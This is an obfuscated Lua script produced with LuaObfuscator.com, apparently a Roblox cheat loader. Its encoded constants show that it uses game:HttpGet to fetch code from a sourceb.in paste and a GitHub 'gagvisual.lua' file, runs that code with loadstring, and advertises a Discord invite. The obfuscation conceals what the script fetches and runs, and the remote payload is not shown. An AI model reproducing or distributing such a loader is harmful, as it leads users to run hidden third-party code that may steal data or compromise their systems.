--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v108=v5(v83,v19);v19=nil;return v108;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-((1639 -(1523 + 114)) -1))) + ((558 + 62) -(555 + 64)))) ;return v84-(v84%1) ;else local v85=(1326 -395) -(857 + 74) ;local v86;while true do if (v85==(568 -(367 + 201))) then v86=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1065 -(68 + 997) ;local v36;local v37;while true do if (0==v35) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + ((965 -(892 + 65)) -6) ;v35=118 -(32 + 85) ;end if (v35==((2 -1) + 0)) then return (v37 * (57 + 199)) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;return (v41 * 16777216) + (v40 * (65886 -(87 + 193 + 70))) + (v39 * (436 -(67 + 113))) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(2 + (1913 -(1789 + 124)))) then v47=v20(v44,83 -62 ,983 -(802 + 150) );v48=((v20(v44,470 -(145 + 293) )==((768 -(745 + 21)) -1)) and  -(1 -0)) or (1 + 0) ;v42=3 + 0 ;end if (((267 + 508) -(201 + 571))==v42) then if (v47==0) then if (v46==(997 -(915 + (225 -143)))) then return v48 * (0 -0) ;else local v109=0 + 0 ;while true do if (v109==(0 + 0)) then v47=1 -(0 -0) ;v45=(10 + 1177) -(1069 + 118) ;break;end end end elseif (v47==(4643 -2596)) then return ((v46==(0 -0)) and (v48 * ((1 + 0 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/((887 -(261 + 624))^(843 -(368 + 423))))) ;end if (v42==((1058 -(87 + 968)) -2)) then v45=19 -(10 + 8) ;v46=(v20(v44,3 -2 ,67 -47 ) * ((444 -(416 + (114 -88)))^(102 -70))) + v43 ;v42=2;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1748 -(690 + 70 + 987) ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1416 -(447 + 966))) then return v6(v52);end if ((2 -1)==v50) then v51=v3(v16,v18,(v18 + v49) -(1818 -(1703 + 114)) );v18=v18 + v49 ;v50=703 -((390 -(9 + 5)) + 325) ;end if (((378 -(85 + 291)) -0)==v50) then v52={};for v92=1, #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=8 -5 ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v107=0;while true do if (0==v107) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 121 -(17 + 104) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v53~=(1 -0)) then else v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v53=(function() return 2 + 0 ;end)();end if (v53~=(2 + 0)) then else v60=(function() return {};end)();for v94= #"|",v59 do local v95=(function() return 0 -0 ;end)();local v96=(function() return;end)();local v97=(function() return;end)();local v98=(function() return;end)();while true do if (v95~=0) then else v96=(function() return 0 -0 ;end)();v97=(function() return nil;end)();v95=(function() return 1 + 0 ;end)();end if (v95~=1) then else v98=(function() return nil;end)();while true do if (v96~=(1637 -(1373 + 263))) then else if (v97== #".") then v98=(function() return v21()~=(1000 -(451 + 549)) ;end)();elseif (v97==2) then v98=(function() return v24();end)();elseif (v97~= #"91(") then else v98=(function() return v25();end)();end v60[v94]=(function() return v98;end)();break;end if ((0 + 0)==v96) then local v151=(function() return 0;end)();local v152=(function() return;end)();while true do if ((0 -0)==v151) then v152=(function() return 0;end)();while true do if (v152==0) then local v204=(function() return 0;end)();while true do if (v204==(0 -0)) then v97=(function() return v21();end)();v98=(function() return nil;end)();v204=(function() return 1;end)();end if (v204~=(1385 -(746 + 638))) then else v152=(function() return 1;end)();break;end end end if (v152~=(1 + 0)) then else v96=(function() return 1 -0 ;end)();break;end end break;end end end end break;end end end v58[ #"xnx"]=(function() return v21();end)();v53=(function() return 344 -(218 + 123) ;end)();end if (v53~=0) then else local v91=(function() return 0;end)();while true do if ((1581 -(1535 + 46))~=v91) then else v54=(function() return function(v110,v111,v112) local v113=(function() return 0 + 0 ;end)();local v114=(function() return;end)();while true do if (v113==(0 + 0)) then v114=(function() return 0;end)();while true do if (v114~=(560 -(306 + 254))) then else v110[v111-#"/" ]=(function() return v112();end)();return v110,v111,v112;end end break;end end end;end)();v55=(function() return {};end)();v91=(function() return 1;end)();end if ((1 + 0)==v91) then v56=(function() return {};end)();v53=(function() return 1;end)();break;end end end if (v53==3) then for v99= #".",v23() do local v100=(function() return 0 -0 ;end)();local v101=(function() return;end)();while true do if (v100==(1467 -(899 + 568))) then v101=(function() return v21();end)();if (v20(v101, #".", #">")~=(0 + 0)) then else local v144=(function() return 0 -0 ;end)();local v145=(function() return;end)();local v146=(function() return;end)();local v147=(function() return;end)();while true do if (v144==2) then if (v20(v146, #",", #"\\")== #"}") then v147[2]=(function() return v60[v147[2]];end)();end if (v20(v146,605 -(268 + 335) ,292 -(60 + 230) )~= #"]") then else v147[ #"91("]=(function() return v60[v147[ #"nil"]];end)();end v144=(function() return 3;end)();end if (v144~=3) then else if (v20(v146, #"asd", #"19(")== #"|") then v147[ #".com"]=(function() return v60[v147[ #"xnxx"]];end)();end v55[v99]=(function() return v147;end)();break;end if (v144==1) then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187~=0) then else v188=(function() return 0;end)();while true do if (v188~=(572 -(426 + 146))) then else v147=(function() return {v22(),v22(),nil,nil};end)();if (v145==0) then local v205=(function() return 0;end)();local v206=(function() return;end)();while true do if (v205~=0) then else v206=(function() return 1456 -(282 + 1174) ;end)();while true do if ((811 -(569 + 242))==v206) then v147[ #"91("]=(function() return v22();end)();v147[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v145== #"|") then v147[ #"-19"]=(function() return v23();end)();elseif (v145==(5 -3)) then v147[ #"91("]=(function() return v23() -(2^(1 + 15)) ;end)();elseif (v145== #"91(") then local v211=(function() return 0;end)();while true do if (v211~=0) then else v147[ #"19("]=(function() return v23() -((1026 -(706 + 318))^16) ;end)();v147[ #"0313"]=(function() return v22();end)();break;end end end v188=(function() return 1;end)();end if (v188==1) then v144=(function() return 2;end)();break;end end break;end end end if (v144~=(1251 -(721 + 530))) then else local v189=(function() return 1271 -(945 + 326) ;end)();while true do if ((0 -0)~=v189) then else v145=(function() return v20(v101,2, #"-19");end)();v146=(function() return v20(v101, #"?id=",6 + 0 );end)();v189=(function() return 1;end)();end if (v189==1) then v144=(function() return 1;end)();break;end end end end end break;end end end for v102= #"/",v23() do v56,v102,v28=(function() return v54(v56,v102,v28);end)();end return v58;end end end local function v29(v61,v62,v63) local v64=v61[701 -(271 + 429) ];local v65=v61[2 + 0 ];local v66=v61[2 + 1 ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=(3863 -2362) -(1408 + 92) ;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -(1289 -(993 + 295)) ;local v76={};local v77={};for v87=0 + 0 ,v75 do if ((v87>=v69) or (1816<=500)) then v73[v87-v69 ]=v74[v87 + ((2718 -1587) -(369 + 761)) ];else v77[v87]=v74[v87 + ((275 + 897) -(418 + 753)) ];end end local v78=(v75-v69) + (2 -1) + 0 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1 + 0 ];if ((3574==3574) and (v80<=(2 + 3 + 0))) then if ((221<390) and (v80<=(1 + 1))) then if (v80<=((276 + 253) -(406 + 123))) then v77[v79[1 + 1 ]]=v79[1772 -(1749 + 20) ]~=(0 + 0) ;elseif ((v80==(1323 -(1249 + 73))) or (2213<=1421)) then local v153;local v154,v155;local v156;v77[v79[2 -0 ]]=v79[3 -0 ]~=(0 + 0) ;v71=v71 + (1146 -(466 + 679)) ;v79=v67[v71];v156=v79[2 + 0 ];v154,v155=v70(v77[v156](v13(v77,v156 + (2 -1) ,v79[8 -5 ])));v72=(v155 + v156) -(1505 -(363 + 1141)) ;v153=1900 -(106 + 1794) ;for v182=v156,v72 do local v183=0 + 0 + 0 ;while true do if ((3058<4860) and (v183==(0 + 0))) then v153=v153 + (164 -(92 + 71)) + 0 ;v77[v182]=v154[v153];break;end end end v71=v71 + 1 + 0 ;v79=v67[v71];v156=v79[5 -3 ];v77[v156]=v77[v156](v13(v77,v156 + 1 ,v72));v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[2]]=v79[(4 + 3) -4 ];v71=v71 + (115 -(4 + 110)) ;v79=v67[v71];v156=v79[586 -(57 + 527) ];v77[v156](v77[v156 + (1662 -((2482 -1005) + 184)) ]);v71=v71 + ((766 -(574 + 191)) -0) ;v79=v67[v71];v71=v79[1430 -(41 + 1386) ];else local v166=856 -(564 + 241 + 51) ;local v167;while true do if (v166==(103 -(17 + 86))) then v167=v79[2 + 0 ];v77[v167](v77[v167 + (1 -0) ]);break;end end end elseif ((v80<=(3 + 0)) or (1296>=4446)) then local v116;local v117,v118;local v119;local v120;v77[v79[478 -(41 + 435) ]]=v63[v79[8 -5 ]];v71=v71 + (167 -(122 + 44)) ;v79=v67[v71];v120=v79[2 -0 ];v119=v77[v79[9 -6 ]];v77[v120 + 1 ]=v119;v77[v120]=v119[v79[4 + 0 ]];v71=v71 + (2 -1) + 0 ;v79=v67[v71];v77[v79[3 -1 ]]=v79[68 -(30 + 35) ];v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1259 -(1043 + 214) ]]=v79[11 -(5 + 3) ]~=(1212 -(323 + 889)) ;v71=v71 + (268 -(176 + 91)) ;v79=v67[v71];v120=v79[5 -3 ];v117,v118=v70(v77[v120](v13(v77,v120 + (581 -(361 + 219)) ,v79[1095 -(975 + 117) ])));v72=(v118 + v120) -(321 -(53 + 267)) ;v116=0 + 0 ;for v148=v120,v72 do local v149=0;while true do if (v149==(413 -(15 + 398))) then v116=v116 + ((852 -(254 + 595)) -2) ;v77[v148]=v117[v116];break;end end end v71=v71 + ((1109 -(55 + 71)) -(18 + (1269 -305))) ;v79=v67[v71];v120=v79[6 -4 ];v77[v120]=v77[v120](v13(v77,v120 + ((1793 -(573 + 1217)) -(5 -3)) ,v72));v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[2 + 0 ]]();v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1 + 1 ]]=v63[v79[3]];v71=v71 + (851 -(20 + (1337 -507))) ;v79=v67[v71];v77[v79[(941 -(714 + 225)) + 0 ]]=v63[v79[129 -(116 + 10) ]];v71=v71 + 1 + 0 ;v79=v67[v71];v120=v79[740 -((1583 -1041) + (272 -76)) ];v119=v77[v79[614 -(66 + 536 + 9) ]];v77[v120 + (1 -0) ]=v119;v77[v120]=v119[v79[1193 -(449 + 740) ]];elseif (v80==(2 + 2)) then local v168=v79[(2 -0) + 0 ];local v169=v77[v79[(808 -(118 + 688)) + 1 ]];v77[v168 + (2 -1) ]=v169;v77[v168]=v169[v79[12 -8 ]];else local v173=0 -0 ;local v174;while true do if (v173==(1551 -(1126 + 425))) then v174=v79[407 -(118 + 287) ];v77[v174]=v77[v174](v13(v77,v174 + (3 -2) ,v72));break;end end end elseif (v80<=(1129 -(118 + 1003))) then if (v80<=(17 -11)) then v77[v79[379 -(142 + 235) ]]=v63[v79[8 -5 ]];elseif ((v80==(31 -24)) or (1393>4489)) then local v175=v79[1 + 1 ];local v176,v177=v70(v77[v175](v13(v77,v175 + (2 -(49 -(25 + 23))) ,v79[980 -(553 + 424) ])));v72=(v177 + v175) -(1 -0) ;local v178=0 + 0 ;for v184=v175,v72 do local v185=683 -(483 + 200) ;while true do if (v185==(0 + 0)) then v178=v178 + 1 + 0 ;v77[v184]=v176[v178];break;end end end else v77[v79[5 -3 ]]();end elseif ((v80<=(5 + 1 + 4)) or (4424<27)) then if ((v80>(11 -2)) or (1997>3815)) then if ((3465>1913) and (v77[v79[2 + 0 ]]==v79[8 -4 ])) then v71=v71 + ((1888 -(927 + 959)) -1) ;else v71=v79[6 -3 ];end else v77[v79[1 + 1 ]]=v79[14 -11 ];end elseif ((733<1819) and (v80==(764 -(239 + 514)))) then do return;end else v71=v79[239 -(141 + 95) ];end v71=v71 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5A6A45504E3179577A632F3003503Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F663473686E2F6D61696E2F726566732F68656164732F6D61696E2F67616D65732F67616776697375616C2E6C756103153Q00646973636F72642E2Q672F63737875326E436B773900173Q0012093Q00013Q00260A3Q00010001000100040C3Q00010001001206000100023Q001203000200033Q00202Q00020002000400122Q000400056Q000500016Q000200056Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q000200020004001209000400064Q0001000500016Q000200056Q00013Q000200122Q000200076Q00010002000100044Q0016000100040C3Q000100012Q000B3Q00017Q00",v9(),...);
